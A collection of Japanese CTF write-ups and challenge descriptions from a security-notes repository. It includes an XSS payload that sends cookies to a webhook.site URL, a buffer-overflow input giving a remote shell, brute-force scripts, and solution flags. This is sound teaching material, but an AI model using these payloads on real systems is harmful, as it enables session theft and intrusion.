"b80cdf50173be0c5bd403db9454a661f1beaf146", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 698, "license_type": "no_license", "max_line_length": 43, "num_lines": 34, "path": "/2021/redpwnCTF_2021/baby/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のテキストが与えられる。\n\n```\nn: 228430203128652625114739053365339856393\ne: 65537\nc: 126721104148692049427127809839057445790\n```\n\nRSA暗号で`n`の値が小さいので、素因数分解ができそうなことが分かる。\n\nFactorDBで素因数分解したところ、`p,q`が分かったので復号化する。\n\n```py\nn = 228430203128652625114739053365339856393\ne = 65537\nc = 126721104148692049427127809839057445790\n\nfrom factordb.factordb import FactorDB\nfrom Crypto.Util.number import *\n\nf = FactorDB(n)\nf.connect()\nfactors = f.get_factor_list()\n\n[p, q] = factors\nd = pow(e,-1,(p-1)*(q-1))\nm = pow(c,d,n)\n\nprint(long_to_bytes(m))\n```\n\n<!-- flag{68ab82df34} -->\n" }, { "alpha_fraction": 0.5123595595359802, "alphanum_fraction": 0.5460674166679382, "avg_line_length": 16.799999237060547, "blob_id": "7a1a30d97390d16ca682392ae298f4eb09aef6df", "content_id": "65d768d74768ade464ba3bbe2ab72f6309ca6fd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 445, "license_type": "no_license", "max_line_length": 54, "num_lines": 25, "path": "/2021/WaniCTF21-spring/Extra/cry-extra/encrypt.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import getPrime, bytes_to_long\n\nwith open(\"flag.txt\", \"rb\") as f:\n flag = f.read()\n\np, q = getPrime(1024), getPrime(1024)\nN = p * q\nM = 2 * p + q\ne = 0x10001\n\n\ndef encrypt(plaintext: bytes) -> int:\n plaintext = bytes_to_long(plaintext)\n c = pow(plaintext, e, N)\n\n return c\n\n\nif __name__ == \"__main__\":\n c = encrypt(flag)\n\n print(f\"{N = }\")\n print(f\"{M = }\")\n print(f\"{e = }\")\n print(f\"{c = }\")\n" }, { "alpha_fraction": 0.6208178400993347, "alphanum_fraction": 0.6586121320724487, "avg_line_length": 23.104476928710938, "blob_id": "af4ba29c9f8b3fcfd8989ae8f82a6461f6d38c1e", "content_id": "542d02fafea377672ac627f2eeccca6bdafe1856", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1951, "license_type": "no_license", "max_line_length": 130, "num_lines": 67, "path": "/2020/WaniCTF/l0g0n/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# writeup\n\n```bash\n$ nc l0g0n.wanictf.org 50002\nChallenge (hex) > 53fd\nServer challenge: b69221d059469d35\nCredential (hex) > 5ffa\nAuthentication 
Failed... 🥺\n```\n\nサーバーサイドのプログラムを読むと、入力する`client_credential`とサーバーで計算する`server_credential`が一致すればよいことがわかる。\n\n```py\nclient_challenge = input(\"Challenge (hex) > \")\n\nclient_credential = input(\"Credential (hex) > \")\n\nserver_credential = cipher.encrypt(client_challenge)\nif client_credential == server_credential:\n print(f\"OK! {flag}\")\n```\n\n肝心の`server_credential`の計算部分だが、計算結果は`plaintext`の長さに依存していることがわかる(★)。そのため、`client_challenge`が1バイトのとき、`server_credential`も1バイトになってしまう。\n\n```py\nclass AES_CFB8:\n def __init__(self, key):\n self.block_size = 16\n self.cipher = AES.new(key, AES.MODE_ECB)\n\n def encrypt(self, plaintext: bytes, iv=bytes(16)):\n iv_plaintext = iv + plaintext\n ciphertext = bytearray()\n\n for i in range(len(plaintext)): # ★\n X = self.cipher.encrypt(iv_plaintext[i : i + self.block_size])[0]\n Y = plaintext[i]\n ciphertext.append(X ^ Y)\n return bytes(ciphertext)\n```\n\nつまり、`client_challenge`を1バイトとしたとき、`server_credential`は`\\x00`~`\\xff`のいずれかになるので、1/256の確率で一致する。\n\n以下を実行してフラグを取得。1/256が引ければ終了。\n\n```py\nfrom pwn import *\n\nconn = remote('l0g0n.wanictf.org',50002)\n\ncnt = 0\nwhile True:\n cnt += 1\n # client_challenge -> server_credential\n conn.sendline('00') # any 1byte\n conn.recvuntil('>')\n # client_credential\n conn.sendline('50') # any 1byte\n conn.recvuntil('>')\n\n msg = str(conn.recvline())\n print(cnt,msg)\n if 'OK' in msg: # 1/256\n break\n\nconn.close()\n```" }, { "alpha_fraction": 0.7360405921936035, "alphanum_fraction": 0.7563451528549194, "avg_line_length": 21, "blob_id": "a659582f51ad25ce2d31c4588a4615c2d8f084d5", "content_id": "6d159f668ce6d25661dbc8b54922d815c3700bc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 311, "license_type": "no_license", "max_line_length": 92, "num_lines": 9, "path": "/2021/angstromCTF_2021/Fish/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n画像を`青い空を見上げればいつもそこに白い猫`を使って解析する。\n\nアルファチャンネルを無効化すると以下の画像が得られる。\n\n![](./fish_disable_alpha.png)\n\n<!-- actf{in_the_m0rning_laughing_h4ppy_fish_heads_in_th3_evening_float1ng_in_your_soup} -->" }, { "alpha_fraction": 0.6470588445663452, "alphanum_fraction": 0.8529411554336548, "avg_line_length": 33, "blob_id": "458451a7a4e50277fb86b115b63d4b8aaf031866", "content_id": "69bb30450f396a2c123d23d0b7a6596e843d2b93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 170, "license_type": "no_license", "max_line_length": 119, "num_lines": 5, "path": "/2021/redpwnCTF_2021/wstrings/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Some strings are wider than normal...\n\nDownloads\n\n[wstrings](https://static.redpwn.net/uploads/c3c2ce7829ac7fb904ab02de13b4fbdda69232159c7a5dfa6d7d0fa37606a45d/wstrings)\n" }, { "alpha_fraction": 0.4476190507411957, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 14.142857551574707, "blob_id": "62b7b370c474b93b1a22287198cabd4089589903", "content_id": "35c3d48b2ff0f12e58fac2d87f76ceaedd0d8575", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 105, "license_type": "no_license", "max_line_length": 27, "num_lines": 7, "path": "/2021/UMassCTF_2021/Hermit_Part_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Help henry find a new shell\n\nhttp://104.197.195.221:8086\n\nhttp://34.121.84.161:8086\n\nCreated by Cobchise#6969" }, { "alpha_fraction": 
0.2869822382926941, "alphanum_fraction": 0.3589743673801422, "avg_line_length": 31.74193572998047, "blob_id": "6308133a9996f045636b6f77b938a218f3d7ba5d", "content_id": "1c58c72b97d44b9602d4ac457bff6a91c3a706cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1016, "license_type": "no_license", "max_line_length": 88, "num_lines": 31, "path": "/2021/UMassCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# UMassCTF 2021\n\n* https://ctf.umasscybersec.org/\n\n* 2021/03/27 07:00 JST — 2021/03/29 07:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ------------------------------ | ---------------------- | ----: | -----: |\n| Rev | [easteregg](easteregg) | Ghidra | 50 | 229 |\n| Misc | [ekrpat](ekrpat) | Dvorak, Python sandbox | 322 | 127 |\n| Web | [Hermit Part 1](Hermit_Part_1) | PHP RCE | 50 | 340 |\n| Forensics | [notes](notes) | Volatility | 50 | 214 |\n| Web | [PikCha](PikCha) | --- | 241 | 153 |\n| Misc | [Scan Me](Scan_Me) | GIMP, QR | 128 | 183 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------- | ------------ | ------- | ----: | -----: |\n\n---\n\n## Result\n\n* 891 points\n\n* 165 / 660 (> 1 pt)" }, { "alpha_fraction": 0.28412699699401855, "alphanum_fraction": 0.3523809611797333, "avg_line_length": 53.80434799194336, "blob_id": "87f123ac0ffbfd81cc92b2e8f00b5c0a2bfd808b", "content_id": "fd96f2043bbedd03fe72696ad20f63763a918aeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2532, "license_type": "no_license", "max_line_length": 106, "num_lines": 46, "path": "/2020/WaniCTF/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# WaniCTF\n\n* https://wanictf.org/\n\n* 2020/11/21 10:00 JST — 2020/11/23 20:00 JST\n\n---\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ---------------------------------- | ------------------------------------ | ----: | -----: |\n| Crypto | [Veni, vidi](Veni_vidi) | ROT13 | 101 | 152 |\n| | [exclusive](exclusive) | XOR | 101 | 96 |\n| | [Basic RSA](Basic_RSA) | RSA | 102 | 76 |\n| | [LCG crack](LCG_crack) | LCG(線形合同法) | 105 | 48 |\n| | [l0g0n](l0g0n) | CVE-2020-1472(Zerologon) | 111 | 33 |\n| Forensics | [logged_flag](logged_flag) | key logger | 101 | 126 |\n| | [ALLIGATOR_01](ALLIGATOR_01) | volatility, pstree | 102 | 83 |\n| | [ALLIGATOR_02](ALLIGATOR_02) | volatility, consoles | 102 | 76 |\n| | [chunk_eater](chunk_eater) | PNG chunk | 102 | 71 |\n| | [ALLIGATOR_03](ALLIGATOR_03) | volatility, hashdump | 104 | 58 |\n| | [zero_size_png](zero_size_png) | PNG CRC32, zlib | 107 | 40 |\n| Misc | [Find a Number](Find_a_Number) | binary search | 101 | 111 |\n| | [MQTT Challenge](MQTT_Challenge) | MQTT | 103 | 65 |\n| Web | [DevTools_1](DevTools_1) | devtool | 100 | 163 |\n| | [DevTools_2](DevTools_2) | devtool | 101 | 154 |\n| | [Simple Memo](Simple_Memo) | directory traversal | 101 | 135 |\n| | [striped table](striped_table) | XSS | 101 | 111 |\n| | [SQL Challenge 1](SQL_Challenge_1) | SQL injection w/o spaces | 102 | 71 |\n| | [SQL Challenge 2](SQL_Challenge_2) | SQL injection w/o special characters | 105 | 50 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| --- | ------- | ------- | ----: | -----: |\n\n---\n\n## Result\n\n* 1951 points\n\n* 50 / 187 (> 1 pt)" }, { "alpha_fraction": 0.5072312355041504, 
"alphanum_fraction": 0.687490701675415, "avg_line_length": 39.654544830322266, "blob_id": "dbeb8ea22bc47917fab574486cce541f6378da4f", "content_id": "5762d71a54f5fe0d4516746170cff22b0a1b7340", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7227, "license_type": "no_license", "max_line_length": 216, "num_lines": 165, "path": "/2020/SunshineCTF/speedrun-00/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`file`コマンドで形式を調べる。\n\n```bash\n$ file chall_00\nchall_00: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=dadca72eeddf37ba3b9fed1543b8ccdf75cbc78e, not stripped\n```\n\nIDAを使って処理の流れを調べる。\n\n![](img/2020-11-08-01-39-21.png)\n\n`gets()`のバッファーオーバーフローの脆弱性をつき、`cmp`で`[rbp+var_8]`を`0FACADEh`に一致させれば良さそう。\n\nそのために、どのくらい文字列を送れば`[rbp+var_8]`を書き換えられるのか調べてみる。\n\nまずは`gets()`まで進む。\n\n```GDB\ngdb-peda$ \n[----------------------------------registers-----------------------------------]\nRAX: 0x0 \nRBX: 0x555555554720 (<__libc_csu_init>:\tpush r15)\nRCX: 0x7ffff7ed41e7 (<__GI___libc_write+23>:\tcmp rax,0xfffffffffffff000)\nRDX: 0x0 \nRSI: 0x5555557562a0 (\"This is the only one\\n\")\nRDI: 0x7fffffffddf0 --> 0x1 \nRBP: 0x7fffffffde30 --> 0x0 \nRSP: 0x7fffffffddf0 --> 0x1 \nRIP: 0x5555555546ea (<main+32>:\tcall 0x5555555545a0 <gets@plt>)\nR8 : 0x15 \nR9 : 0x7c ('|')\nR10: 0x7ffff7faebe0 --> 0x5555557566a0 --> 0x0 \nR11: 0x246 \nR12: 0x5555555545c0 (<_start>:\txor ebp,ebp)\nR13: 0x7fffffffdf20 --> 0x1 \nR14: 0x0 \nR15: 0x0\nEFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\n 0x5555555546de <main+20>:\tlea rax,[rbp-0x40]\n 0x5555555546e2 <main+24>:\tmov rdi,rax\n 0x5555555546e5 <main+27>:\tmov eax,0x0\n=> 0x5555555546ea <main+32>:\tcall 0x5555555545a0 <gets@plt>\n 0x5555555546ef <main+37>:\tcmp DWORD PTR [rbp-0x4],0xfacade\n 0x5555555546f6 <main+44>:\tjne 0x555555554704 <main+58>\n 0x5555555546f8 <main+46>:\tlea rdi,[rip+0xba] # 0x5555555547b9\n 0x5555555546ff <main+53>:\tcall 0x555555554590 <system@plt>\nGuessed arguments:\narg[0]: 0x7fffffffddf0 --> 0x1 \n[------------------------------------stack-------------------------------------]\n0000| 0x7fffffffddf0 --> 0x1 \n0008| 0x7fffffffddf8 --> 0x55555555476d (<__libc_csu_init+77>:\tadd rbx,0x1)\n0016| 0x7fffffffde00 --> 0x7ffff7fb3fc8 --> 0x0 \n0024| 0x7fffffffde08 --> 0x555555554720 (<__libc_csu_init>:\tpush r15)\n0032| 0x7fffffffde10 --> 0x0 \n0040| 0x7fffffffde18 --> 0x5555555545c0 (<_start>:\txor ebp,ebp)\n0048| 0x7fffffffde20 --> 0x7fffffffdf20 --> 0x1 \n0056| 0x7fffffffde28 --> 0x0 \n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\n0x00005555555546ea in main ()\n```\n\n次に、`pattc`で生成した文字列を送り込む。\n\n```GDB\ngdb-peda$ pattc 100\n'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'\ngdb-peda$ ni\nAAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n[----------------------------------registers-----------------------------------]\nRAX: 0x7fffffffddf0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nRBX: 0x555555554720 (<__libc_csu_init>:\tpush r15)\nRCX: 0x7ffff7fae980 --> 0xfbad2288 \nRDX: 0x0 \nRSI: 0x5555557566b1 
(\"AA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\\n\")\nRDI: 0x7ffff7fb14d0 --> 0x0 \nRBP: 0x7fffffffde30 (\"AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nRSP: 0x7fffffffddf0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nRIP: 0x5555555546ef (<main+37>:\tcmp DWORD PTR [rbp-0x4],0xfacade)\nR8 : 0x7fffffffddf0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nR9 : 0x0 \nR10: 0x7ffff7faebe0 --> 0x555555756ab0 --> 0x0 \nR11: 0x246 \nR12: 0x5555555545c0 (<_start>:\txor ebp,ebp)\nR13: 0x7fffffffdf20 --> 0x1 \nR14: 0x0 \nR15: 0x0\nEFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\n 0x5555555546e2 <main+24>:\tmov rdi,rax\n 0x5555555546e5 <main+27>:\tmov eax,0x0\n 0x5555555546ea <main+32>:\tcall 0x5555555545a0 <gets@plt>\n=> 0x5555555546ef <main+37>:\tcmp DWORD PTR [rbp-0x4],0xfacade\n 0x5555555546f6 <main+44>:\tjne 0x555555554704 <main+58>\n 0x5555555546f8 <main+46>:\tlea rdi,[rip+0xba] # 0x5555555547b9\n 0x5555555546ff <main+53>:\tcall 0x555555554590 <system@plt>\n 0x555555554704 <main+58>:\tcmp DWORD PTR [rbp-0x8],0xfacade\n[------------------------------------stack-------------------------------------]\n0000| 0x7fffffffddf0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0008| 0x7fffffffddf8 (\"ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0016| 0x7fffffffde00 (\"AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0024| 0x7fffffffde08 (\"(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0032| 0x7fffffffde10 (\"A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0040| 0x7fffffffde18 (\"AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0048| 0x7fffffffde20 (\"bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0056| 0x7fffffffde28 (\"AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\n0x00005555555546ef in main ()\n```\n\n`[rbp-0x4]`の値を見て、オフセットを調べる。\n\n```GDB\ngdb-peda$ x $rbp-0x4\n0x7fffffffde2c:\t\"2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\"\ngdb-peda$ patto 2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 60\n```\n\nオフセットが60だと分かったので適当な文字で60文字分埋め、`0x00facade`を付け加えたものを送る。\n(リトルエンディアンであることに注意)\n\n```bash\n$ python3 -c \"import sys;sys.stdout.buffer.write(b'A'*60 + b'\\xde\\xca\\xfa\\x00')\" > input\n$ cat input /dev/stdin | nc chal.2020.sunshinectf.org 30000\n```\n\n2行目の標準入力でbashのコマンドが実行できる。\n\n```bash\n$ cat input /dev/stdin | nc chal.2020.sunshinectf.org 30000\nThis is the only one\nls\nls -la\ntotal 36\ndrwxr-xr-x 1 chall_00 chall_00 4096 Nov 7 08:51 .\ndrwxr-xr-x 1 root root 4096 Nov 7 08:51 ..\n-rw-r--r-- 1 chall_00 chall_00 220 Aug 31 2015 .bash_logout\n-rw-r--r-- 1 chall_00 chall_00 3771 Aug 31 2015 .bashrc\n-rw-r--r-- 1 chall_00 chall_00 655 Jul 12 2019 .profile\n-rwxr-xr-x 1 root root 8392 Nov 7 07:49 chall_00\n-rw-r----- 1 root chall_00 35 Nov 7 08:51 flag.txt\n^C\n\n$ cat input /dev/stdin | nc chal.2020.sunshinectf.org 30000\nThis is the only one\n \ncat flag.txt\n```\n\n<!-- sun{burn-it-down-6208bbc96c9ffce4} 
-->\n\n**[ハマったこと]**\n\npython3系ではバイト文字列の出力方法が違うので注意する。\n\n* https://www.366service.com/jp/qa/a2f0316cea73399d1c68c221ee29fbb7\n\n標準入力が閉じないように`/dev/stdin`をつける。\n\n* http://flag.hatenablog.jp/entry/2017/09/11/225013" }, { "alpha_fraction": 0.7605633735656738, "alphanum_fraction": 0.7957746386528015, "avg_line_length": 27.399999618530273, "blob_id": "d63b348bded3840b098cc0a96b313c961bff54b6", "content_id": "2666eca628a13c02a931796dfd70d55e1c9429fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 186, "license_type": "no_license", "max_line_length": 95, "num_lines": 5, "path": "/2021/WaniCTF21-spring/slow/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "宇宙からメッセージが届きました。(※音量注意!)\n\n[for-slow.zip](https://score.wanictf.org/storage/d3ps2tqhbwpzhwndtz9ggt2r5kwncyac/for-slow.zip)\n\nWriter : takushooo\n" }, { "alpha_fraction": 0.7752808928489685, "alphanum_fraction": 0.7977527976036072, "avg_line_length": 58.66666793823242, "blob_id": "1d52634b801f7d29ae3f2cdb09a78b136e8eede3", "content_id": "5479f835d4a281c9c44750e219784ec88eef890c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 178, "license_type": "no_license", "max_line_length": 154, "num_lines": 3, "path": "/2020/CyberSecurityRumble2020/Cyberwall/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "We had problems with hackers, but now we got a [enterprise firewall system](http://chal.cybersecurityrumble.de:3812/) build by a leading security company.\n\nAuthor: rugo|RedRocket" }, { "alpha_fraction": 0.6877729296684265, "alphanum_fraction": 0.7947598099708557, "avg_line_length": 40.727272033691406, "blob_id": "8c1b7bf1266329b7e50ed4c3aa07553b4975eea9", "content_id": "18062eff588a6b6808d68eca70975107b473b495", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 458, "license_type": "no_license", "max_line_length": 133, "num_lines": 11, "path": "/2021/DiceCTF_2021/Babier_CSP/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "[Baby CSP](https://2020.justctf.team/challenges/14) was too hard for us, try Babier CSP.\n\n[babier-csp.dicec.tf](https://babier-csp.dicec.tf/)\n\n[Admin Bot](https://us-east1-dicegang.cloudfunctions.net/ctf-2021-admin-bot?challenge=babier-csp)\n\nThe admin will set a cookie secret equal to config.secret in index.js.\n\nDownloads\n\n[index.js](https://dicegang.storage.googleapis.com/uploads/12b7c924573d906f2f6abfd5b43618e56c81e1e72fd875a39cfa9cbe0a38a4c5/index.js)" }, { "alpha_fraction": 0.704273521900177, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 20.66666603088379, "blob_id": "22861d859040373cf2485129296b3a06cfff576c", "content_id": "42e1778299eec3d09ccce226f6f2ee68a9ed378b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 717, "license_type": "no_license", "max_line_length": 135, "num_lines": 27, "path": "/2021/redpwnCTF_2021/scissor/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n暗号文`egddagzp_ftue_rxms_iuft_rxms_radymf`と、以下のプログラムが与えられる。\n\n```py\nimport random\n\nkey = random.randint(0, 25)\nalphabet = 'abcdefghijklmnopqrstuvwxyz'\nshifted = alphabet[key:] + alphabet[:key]\ndictionary = dict(zip(alphabet, shifted))\n\nprint(''.join([\n dictionary[c]\n if c in dictionary\n else c\n for c in 
input()\n]))\n```\n\nランダムな数でローテーションシフトしていることが分かる。\n\nROT14したところ、意味のある英文になった。\n\n* [CyberChef](https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,false,14)&input=ZWdkZGFnenBfZnR1ZV9yeG1zX2l1ZnRfcnhtc19yYWR5bWY)\n\n<!-- flag{surround_this_flag_with_flag_format} -->\n" }, { "alpha_fraction": 0.6404494643211365, "alphanum_fraction": 0.8164793848991394, "avg_line_length": 52.599998474121094, "blob_id": "10490b7bac98293088c4029333f2e555db0fe6c4", "content_id": "7aa6e8ce0bc4e1715428dd9b9f698da7a45610f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 267, "license_type": "no_license", "max_line_length": 207, "num_lines": 5, "path": "/2021/angstromCTF_2021/Im_so_Random/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Aplet's quirky and unique so he made my own [PRNG](https://files.actf.co/a155e414e8cc7e0279ffe40225d7295fda5c2b79116313c2cb8fb8bf22dda70d/chall.py)! It's not like the other PRNGs, its absolutely unbreakable!\n\n`nc crypto.2021.chall.actf.co 21600`\n\nAuthor: EvilMuffinHa" }, { "alpha_fraction": 0.590099036693573, "alphanum_fraction": 0.6455445289611816, "avg_line_length": 9.326530456542969, "blob_id": "7569ccc455509564f952ab6e91b052536e8940a1", "content_id": "a82442e956b2e7a739d8650455234157fe48f117", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 787, "license_type": "no_license", "max_line_length": 47, "num_lines": 49, "path": "/2020/HITCON_CTF_2020/Welcome/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n問題文に指定されている場所へSSH接続する。\n\n```bash\nssh [email protected]\npassword: hitconctf\n```\n\nとりあえず、`ls`コマンドを実行。\n\n```bash\n$ ls\n```\n\n![](img/2020-11-28-11-31-28.png)\n\nアニメーションが流れる。すごい。\n\n`ls`はダメそうなので、ほかのコマンドを試してみる。\n\n```bash\n$ cd /\n/bin/sh: 1: dc: not found\n```\n\n`cd`コマンドが`dc`として認識されていた。\n\nつまり`ls`を入力したいなら`sl`と入力する必要がある。(先ほどのアニメーションはSL?)\n\n```bash\n$ sl\nflag\n```\n\n```bash\n$ tac flag\ncat: galf: No such file or directory\n```\n\n引数も逆から読む。\n\n```bash\n$ tac galf\n```\n\nフラグを入手。\n\n<!-- hitcon{!0202 ftcnoctih ot emoclew} -->" }, { "alpha_fraction": 0.6159420013427734, "alphanum_fraction": 0.727053165435791, "avg_line_length": 26.600000381469727, "blob_id": "1522303f0db04f686b666a42184008ee2512bf2d", "content_id": "ed35941e118c1c8068e7dd53d2f47bf941fece3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 572, "license_type": "no_license", "max_line_length": 110, "num_lines": 15, "path": "/2021/redpwnCTF_2021/pastebin-1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n[pastebin-1.mc.ax](https://pastebin-1.mc.ax/) にアクセスする。\n\nフォームに`<script>`タグを入れてみたところ実行されたので、XSSができることが分かった。\n\nadminのcookieを抜き取りたいので、以下のスクリプトを入力した先のURLを[Admin bot](https://admin-bot.mc.ax/pastebin-1)に踏んでもらう。\n\n```html\n<script>window.open('https://webhook.site/4786afe9-a094-44b5-bb0b-9be905b53eb0/?q='+document.cookie);</script>\n```\n\n![](img/2021-07-10-15-30-59.png)\n\n<!-- flag{d1dn7_n33d_70_b3_1n_ru57} -->\n" }, { "alpha_fraction": 0.6301887035369873, "alphanum_fraction": 0.6848063468933105, "avg_line_length": 23.44660186767578, "blob_id": "0c8d67f25a61c4d2b110709850afa3f2f27e4249", "content_id": "4443c2e686bad11c9790569bf0179c50260c6149", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5786, "license_type": "no_license", 
"max_line_length": 179, "num_lines": 206, "path": "/2020/SquareCTF2020/Hash_My_Awesome_Commands/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nGoプログラムのmain関数の中身を見ると、`(command)|(base64)` の形式でを入力すればよいことがわかる。\n\n```go\nvar commands = []string{\n\t\"flag\",\n\t\"debug\",\n}\n```\n\n```go\ninput = strings.TrimSpace(input)\ncomponents := strings.Split(input, \"|\")\nif len(components) < 2 {\n fmt.Println(\"command must contain hmac signature\")\n continue\n}\n\ncommand := components[0]\ncheck, err := base64.StdEncoding.DecodeString(components[1])\nif err != nil {\n fmt.Println(\"hmac must be base64\")\n continue\n}\n\nif !contains(commands, command) {\n fmt.Println(\"invalid command\")\n continue\n}\n```\n\n問題文中の`9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=`がBase64文字列っぽいので、入力してみる。\n\n```bash\n$ nc challenges.2020.squarectf.com 9020\n\nEnter command: flag|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ninvalid hmac\n\nEnter command: debug|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ndebug mode enabled\n-----------DEBUG MODE ENABLED-----------\n\nEnter command: flag|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ncommand: flag, check: 9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ntook 666178 nanoseconds to verify hmac\ninvalid hmac\n```\n\nどうやら上のBase64文字列がデバッグコマンドを実行するために必要な文字列になっているらしい。\n\n```go\ncheck, err := base64.StdEncoding.DecodeString(components[1])\nif err != nil {\n fmt.Println(\"hmac must be base64\")\n continue\n}\n\nif !hmacWrapper.verifyHmac(command, check) {\n fmt.Println(\"invalid hmac\")\n continue\n}\n```\n\n```go\nfunc (h *HmacVerifier) verifyHmac(message string, check []byte) bool {\n\tstart := time.Now()\n\tmatch := compare(h.codes[message], check)\n\tverifyTime := time.Since(start).Nanoseconds()\n\n\tif debug {\n\t\tfmt.Printf(\"took %d nanoseconds to verify hmac\\n\", verifyTime)\n\t}\n\n\treturn 